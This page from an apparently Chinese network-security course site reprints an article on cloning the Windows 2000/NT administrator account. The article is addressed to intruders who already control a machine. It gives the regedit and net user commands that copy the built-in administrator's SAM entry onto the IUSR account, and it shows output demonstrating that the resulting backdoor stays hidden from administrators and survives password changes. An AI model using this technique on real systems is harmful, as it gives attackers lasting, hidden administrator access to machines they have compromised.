| 首页 | 课程信息 | 教学队伍 | 教学内容 | 教学方法与手段 | 教学条件 | 教学效果 | 网络安全技术 | 政策支持 | 论坛 |
 您的位置:>> 首页 >> 网络安全技术>>安全文摘>>如何克隆管理员帐号
 安全文摘                     
 Cisco路由器的安全配置简易方案
 TIS防火墙详述
 SQL Server 2000的安全配置
 windows日志的保护与伪造
 FTP命令大全
 如何克隆管理员帐号
 网络的安全策略
 安全漏洞                     
 IE7第一个正式漏洞
 GNU GZip文档处理多个安全漏洞
 玩转XP系统还原功能与技巧图解
 轻易绕过 PW论坛程序高危漏洞攻防详解
 Google代码搜索窥探程序漏洞
 Microsoft 2007年6月严重级漏洞补丁下载
 微软公布DNS服务RPC接口漏洞  影响服务器系统
 安全访谈                     
 “正”、“邪”两类黑客的四大主要行为
 CSO们的困惑网络管理还是安全管理?
 动机是什么美国黑客讲述黑客法则
 攻克Vista者说:防毒软件没有效果
 互联网之父:垃圾邮件病毒出现感到意外
 卡巴斯基为信息安全提供可靠的‘门锁
 女黑客苏樱对网络安全感兴趣的老菜鸟
 黑客攻防                     
 ASP漏洞攻击
 IPC$漏洞入侵
 MS SQL-SERVER空口令入侵
 基于3389端口结合输入法漏洞入侵
 轻松破解网吧禁用盘实例两则
 突破百度贴吧的验证码限制
 网吧上网预防泄密的十大方法
 安全软件                     
 ipbook(超级网络邻居)
 ip数据库
 adsl密码破解软件
 局域网查看工具V1.60
 星号密码获取工具
 X-Scan-v3.3
 SuperScan3.0
       安全文摘

                                                       如何克隆管理员帐号

Author:Adam@nsfocus.com

Site:http://www.sometips.com

经常看到一些人在入侵一台Windows 2000或者Windows NT后堂而皇之地创建一个管理员组的
用户,似乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share一个类似于RootKit
的玩艺,当然,这些过程也是可以用脚本实现的,但是我就不写了,OK,Show Time Now。

首先要让大家知道的概念是在Windows 2000和Windows NT里,默认管理员帐号的SID是固定的
500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在
这里我们选择的帐号是IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号,
所有用户都可以用以下的方法,只不过这个用户较常见罢了),测试环境为Windows 2000 S
erver。

运行一个System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 H
ttp://www.sometips.com/soft/psu.exe),然后在该CMD Shell里面运行
regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
这样我们将SID 为500的管理员帐号的相关信息导出,然后编辑adam.reg文件,将adam.reg文
件的第三行--[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最后的"1F
4"修改为IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安
装的时候没有安装IIS,而自己创建了帐号后再安装IIS就有可能不是这个值),将Root.reg
文件中的"1F4"修改为"3E9"后执行
regedit /s adam.reg
导入该Reg文件

然后运行
net user IUSR_MachineName Sometips
修改IUSR_MachineName的密码(最好使用14位的密码,越像IUSR_MachineName的密码越好)

OK,大功告成...

这样,我们拥有和默认管理员一样的桌面、一样的Profile.....
而且,当我们运行 net localgroup administrators 时,看看结果:
C:\>net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the compu
ter/domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.

再看看USER2SID的输出结果:
C:\>user2sid Administrator

S-1-5-21-1004336348-1078145449-854245398-500

Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

C:\>user2sid iusr_machinename

S-1-5-21-1004336348-1078145449-854245398-1001

Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

我想,再高明的管理员也看不到任何的异状了...而且,随便管理员改成什么密码,我照样可
以用IUSR_MachineName,密码为Sometips登陆...(没有哪位大侠级的管理员喜欢经常修改IU
SR_MachineName为其他的名字吧)
Copyright © 2005 - 2006. All Rights Reserved.
页面执行时间:390.625 毫秒
当前模版:[默认风格]